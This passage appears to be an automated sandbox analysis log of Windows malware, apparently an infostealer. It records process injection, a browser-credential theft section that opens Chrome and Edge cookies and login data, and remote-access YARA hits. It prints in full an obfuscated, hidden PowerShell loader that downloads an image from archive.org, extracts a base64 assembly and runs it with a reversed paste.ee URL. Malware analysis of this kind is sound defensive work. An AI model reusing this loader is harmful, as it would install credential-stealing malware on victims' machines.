Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: NULL target: C:\Windows\SysWOW64\dllhost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: read write
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\dllhost.exe Thread register set: target process: 4140
Source: C:\Windows\SysWOW64\dllhost.exe Thread APC queued: target process: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 8DE008
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"
Source: C:\Windows\SysWOW64\dllhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,26,25]-join'')( (('{0}im'+'ageurl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/de'+'tahnote'+'_v.jpg {1};{0}webclient = '+'new-obj'+'ect system.net.webcli'+'e'+'nt;{0}imagebytes = {0}webclien'+'t.downloaddat'+'a({0}imageurl);{0}imagetext = [system.text.encoding]::utf8.ge'+'tstring({0}imagebytes);{0}s'+'tartflag = {1}<<base64_start>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = {0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endflag);{0}startindex -ge 0 -and {'+'0}endindex -gt {0}startindex;{0}startindex += {0}startflag.lengt'+'h;{0}base64length = {0}endindex - {0}startindex;{0}base64command = {0}imagetext.substring({0}startindex,'+' {0}base64length);{0}commandbytes = [syst'+'em.convert]::fro'+'mbase64string({0}'+'base64command);{0}loa'+'dedassemb'+'ly = '+'[system.reflection.a'+'ssembly]::load({0}commandbytes);{0}vaimethod = [dnlib.'+'io.home'+'].getmethod({1}vai{1});{0}vaimethod.invoke({0}null, @'+'({1}0/hbpfm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [char]36,[char]39))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjgvudjpjb21zcevjwzqsmjysmjvdluppsu4njykoicgoj3swfwltjysnywdlvxjsid0gezf9ahr0chm6ly9pytywmdewjysnmi51cy5hcmnoaxzllm9yzy8zmi9pdgunkydtcy9kzxrhac1ub3rllxzfmjayndewl0rljysndgfotm90zscrj19wlmpwzyb7mx07ezb9d2viq2xpzw50id0gjysntmv3lu9iaicrj2vjdcbtexn0zw0utmv0lldlyknsascrj2unkyduddt7mh1pbwfnzuj5dgvzid0gezb9d2viq2xpzw4nkyd0lkrvd25sb2fkrgf0jysnysh7mh1pbwfnzvvybck7ezb9aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzscrj3rtdhjpbmcoezb9aw1hz2vcexrlcyk7ezb9cycrj3rhcnrgbgfnid0gezf9pdxcqvnfnjrfu1rbulq+pnsxftt7mh1lbmrgbgfnid0gezf9pdxcqvnfjysnnjrfru5epj57mx07ezb9c3rhcnrjbmrleca9ihswfwltywdlvgv4dc5jbmrlee9mkhswfxn0yxj0rmxhzyk7ezb9zw5ksw5kzxggpsb7mh1pbwfnzvrlehqusw5kzxhpzih7mh1lbmrgbgfnktt7mh1zdgfydeluzgv4ic1nzsawic1hbmqgeycrjzb9zw5ksw5kzxgglwd0ihswfxn0yxj0sw5kzxg7ezb9c3rhcnrjbmrlecarpsb7mh1zdgfydezsywcutgvuz3qnkydoo3swfwjhc2u2nexlbmd0aca9ihswfwvuzeluzgv4ic0gezb9c3rhcnrjbmrledt7mh1iyxnlnjrdb21tyw5kid0gezb9aw1hz2vuzxh0lln1ynn0cmluzyh7mh1zdgfydeluzgv4lccrjyb7mh1iyxnlnjrmzw5ndggpo3swfwnvbw1hbmrcexrlcya9ifttexn0jysnzw0uq29udmvydf06okzybycrj21cyxnlnjrtdhjpbmcoezb9jysnymfzzty0q29tbwfuzck7ezb9bg9hjysnzgvkqxnzzw1ijysnbhkgpsankydbu3lzdgvtlljlzmxly3rpb24uqscrj3nzzw1ibhldojpmb2fkkhswfwnvbw1hbmrcexrlcyk7ezb9dmfptwv0ag9kid0gw2rubglilicrj0lplkhvbwunkyddlkdlde1ldghvzch7mx1wqul7mx0po3swfxzhau1ldghvzc5jbnzva2uoezb9bnvsbcwgqccrjyh7mx0wl2hcueztl2qvzwuuzxrzyxavlzpzchr0ahsxfscrjywgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdicrj2fkb3sxfswgezf9mxsxfswgezf9yxbwawr0zwx7mscrj30pktsnksatziagw2niqxjdmzysw2niqxjdmzkpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,26,25]-join'')( (('{0}im'+'ageurl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/de'+'tahnote'+'_v.jpg {1};{0}webclient = '+'new-obj'+'ect system.net.webcli'+'e'+'nt;{0}imagebytes = {0}webclien'+'t.downloaddat'+'a({0}imageurl);{0}imagetext = [system.text.encoding]::utf8.ge'+'tstring({0}imagebytes);{0}s'+'tartflag = {1}<<base64_start>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = {0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endflag);{0}startindex -ge 0 -and {'+'0}endindex -gt {0}startindex;{0}startindex += {0}startflag.lengt'+'h;{0}base64length = {0}endindex - {0}startindex;{0}base64command = {0}imagetext.substring({0}startindex,'+' {0}base64length);{0}commandbytes = [syst'+'em.convert]::fro'+'mbase64string({0}'+'base64command);{0}loa'+'dedassemb'+'ly = '+'[system.reflection.a'+'ssembly]::load({0}commandbytes);{0}vaimethod = [dnlib.'+'io.home'+'].getmethod({1}vai{1});{0}vaimethod.invoke({0}null, @'+'({1}0/hbpfm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [char]36,[char]39))"
Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\dllhost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\dllhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY